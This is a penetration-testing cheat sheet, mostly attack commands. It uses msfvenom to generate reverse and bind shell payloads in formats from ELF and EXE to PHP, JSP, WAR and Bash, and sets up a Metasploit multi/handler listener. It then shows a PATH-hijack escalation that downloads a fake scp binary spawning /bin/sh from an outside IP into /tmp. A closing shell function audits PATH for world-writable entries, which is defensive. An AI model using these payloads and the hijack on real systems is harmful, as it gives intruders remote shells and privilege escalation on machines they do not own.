msfvenom
Show all payloads
msfvenom -l payloads
Show all payload formats
msfvenom -l formats
Generate a payload
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output payload file name>
Common payloads
meterpreter

| Payload | Description |
| --- | --- |
| linux/x86/meterpreter/reverse_tcp | linux x86 reverse shell |
| linux/x64/meterpreter/reverse_tcp | linux x64 reverse shell |
| windows/meterpreter/reverse_tcp | windows x86 reverse shell |
| windows/x64/meterpreter/reverse_tcp | windows x64 reverse shell |

Staged

| Payload | Description |
| --- | --- |
| linux/x86/shell/bind_tcp | linux x86 bind shell |
| linux/x86/shell/reverse_tcp | linux x86 reverse shell |
| windows/shell/bind_tcp | windows x86 bind shell |
| windows/shell/reverse_tcp | windows x86 reverse shell |

Nonstaged

| Payload | Description |
| --- | --- |
| linux/x86/shell_bind_tcp | linux x86 bind shell |
| linux/x86/shell_reverse_tcp | linux x86 reverse shell |
| windows/shell_bind_tcp | windows x86 bind shell |
| windows/shell_reverse_tcp | windows x86 reverse shell |
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
The raw PHP payload comes without the opening tag, so we then need to prepend <?php as the first line of the file for it to execute as a PHP page (portable one-liner; the original used the macOS-only pbcopy/pbpaste):
printf '<?php ' | cat - shell.php > shell.php.tmp && mv shell.php.tmp shell.php
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl
Metasploit
use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z
PATH hijack: this creates a fake scp binary that just spawns /bin/sh. Dropped into /tmp with /tmp placed first in PATH, it gets picked up by anything that calls scp by its bare name instead of an absolute path.
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp
wget 192.168.1.23/scp -O /tmp/scp   # transfer the exec binary over to Sufferance
chmod 755 /tmp/scp
export PATH=/tmp:$PATH              # /tmp is now searched before the real binary directories
/usr/local/bin/                     # whatever here calls scp by bare name now runs our "special" scp binary in /tmp instead
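The hijack above only works because an attacker-writable directory sits in PATH ahead of the real binaries. As an added defensive check (not part of the original cheat sheet), this POSIX sh function audits a PATH string for exactly those entries: empty or "." entries, and world-writable directories such as /tmp.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: audit a PATH value for
# entries that allow the /tmp-style scp hijack described above.
# check_path_entries PATHSTRING
#   prints one "RISK ..." line per dangerous entry and returns 1 if any was
#   found, 0 if the PATH looks clean. Nonexistent directories are skipped.
check_path_entries() {
    _rc=0
    # Trailing ':' sentinel so a trailing empty entry ("a:b:") is also seen.
    _rest="$1:"
    while [ -n "$_rest" ]; do
        # Split off the first colon-separated entry by hand; a for-loop over
        # IFS-split words would silently drop empty entries.
        _dir="${_rest%%:*}"
        _rest="${_rest#*:}"
        # Empty or "." entries mean "the current directory": a binary dropped
        # wherever a privileged script happens to cd wins the lookup.
        if [ -z "$_dir" ] || [ "$_dir" = "." ]; then
            echo "RISK relative/empty PATH entry '$_dir'"
            _rc=1
            continue
        fi
        [ -d "$_dir" ] || continue
        # World-writable directory (/tmp is the classic case): any local user
        # can place a fake scp, ls, ... that callers using bare names pick up.
        if [ -n "$(find "$_dir" -prune -perm -0002 2>/dev/null)" ]; then
            echo "RISK world-writable PATH entry '$_dir'"
            _rc=1
        fi
    done
    return $_rc
}

# Stand-alone use: audit the caller's own PATH, e.g. from a cron job's
# environment or a sudo-invoked script.
# check_path_entries "$PATH"
```

Run it against the PATH a privileged script or cron job actually executes with, not your interactive shell's, since that is the lookup order the hijack abuses.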